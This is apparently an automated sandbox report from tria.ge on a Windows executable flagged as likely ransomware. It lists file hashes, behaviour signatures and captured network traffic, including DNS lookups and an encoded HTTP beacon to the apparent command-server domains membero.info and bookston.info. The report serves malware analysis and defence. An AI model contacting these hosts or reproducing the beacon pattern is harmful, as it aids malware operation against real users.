Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    88s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/10/2022, 12:33 UTC

General

  • Target

    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe

  • Size

    295KB

  • MD5

    91e2443a602bf99accecf6e13c04ff50

  • SHA1

    4516b0b4377a2f8e59d49f3accc9eb2bed0d8271

  • SHA256

    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7

  • SHA512

    f6dddafbe2ad2ae1a71422b1e0471a635a68f36ec4f934b7a74d72a6b6addaed0ea74e33a276e4dada4a1f4e29f7d756ddde667c4f93a1a56101fe24bbf8f112

  • SSDEEP

    6144:VQ6Yd0LZbZhY2U1FCDvzqQy/yvnSV+1hSDh8rkcMgJHK35ITm:VQMZbZhYiDucaV+1h6LcoJ7

Score
7/10

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Processes

  • C:\Users\Admin\AppData\Local\Temp\38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
    "C:\Users\Admin\AppData\Local\Temp\38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe"
    1⤵
    • Drops startup file
    • Drops file in Windows directory
    PID:1824

Network

  • flag-us
    DNS
    membero.info
    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
    Remote address:
    8.8.8.8:53
    Request
    membero.info
    IN A
    Response
  • flag-us
    DNS
    bookston.info
    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
    Remote address:
    8.8.8.8:53
    Request
    bookston.info
    IN A
    Response
    bookston.info
    IN A
    58.158.177.102
  • flag-jp
    GET
    http://bookston.info/hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI
    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
    Remote address:
    58.158.177.102:80
    Request
    GET /hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
    Host: bookston.info
    Response
    HTTP/1.1 404 Not Found
    Date: Wed, 19 Oct 2022 12:34:48 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
    Content-Length: 201
    Content-Type: text/html; charset=iso-8859-1
  • 58.158.177.102:80
    http://bookston.info/hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI
    http
    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
    903 B
    513 B
    5
    3

    HTTP Request

    GET http://bookston.info/hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI

    HTTP Response

    404
  • 93.184.220.29:80
    322 B
    7
  • 204.79.197.200:443
    www.bing.com
    tls
    611 B
    7.4kB
    9
    9
  • 20.42.73.24:443
    322 B
    7
  • 178.79.208.1:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 8.8.8.8:53
    membero.info
    dns
    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
    58 B
    137 B
    1
    1

    DNS Request

    membero.info

  • 8.8.8.8:53
    bookston.info
    dns
    38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
    59 B
    75 B
    1
    1

    DNS Request

    bookston.info

    DNS Response

    58.158.177.102

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1824-132-0x00000000050C0000-0x00000000050EF000-memory.dmp

    Filesize

    188KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.